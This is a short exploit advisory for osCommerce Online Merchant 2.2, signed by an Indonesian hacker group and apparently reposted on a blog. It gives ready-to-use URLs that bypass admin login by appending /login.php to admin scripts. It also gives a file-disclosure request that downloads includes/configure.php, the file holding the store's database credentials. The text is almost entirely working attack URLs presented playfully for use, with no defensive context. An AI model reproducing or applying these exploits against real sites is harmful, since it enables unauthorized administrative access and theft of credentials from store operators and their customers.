Author : Bintang |
Date : May, 30, 2010 |
Location : Bekasi, Indonesia |
Time Zone : GMT +7:00 |
Software : OsCommerce Online Merchant v2.2 |
Tested on : All OS |
-------------------------------------------- |
Email : bintang@hackermail.com |
gReets : Indonesian Hacker |
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be |
Spykit, BobyHikaru, Fribo. all member. |
Site : Http://www.Devilzc0de.org/forum/ |
Forum : Http://Indonesianhacker.or.id/ |
-------------------------------------------- |
# ByPass Page Admin : |
You can use this Trick if admin folder not protected by .htaccess |
if you Want to explore admin page without login. You can use /login.php behind the name of the file |
Example : |
http://[site]/admin/backup.php/login.php |
or |
http://[site]/admin/file_manager.php/login.php |
Demo : |
http://server/store/admin/file_manager.php/login.php |
You can See all file in Directory Oscommerce.. haha ;) |
and you can download all file with tRick above |
# File Disclosure : |
in : admin/file_manager.php/login.php?action=download&filename= |
Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php |
Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Tidak ada komentar:
Posting Komentar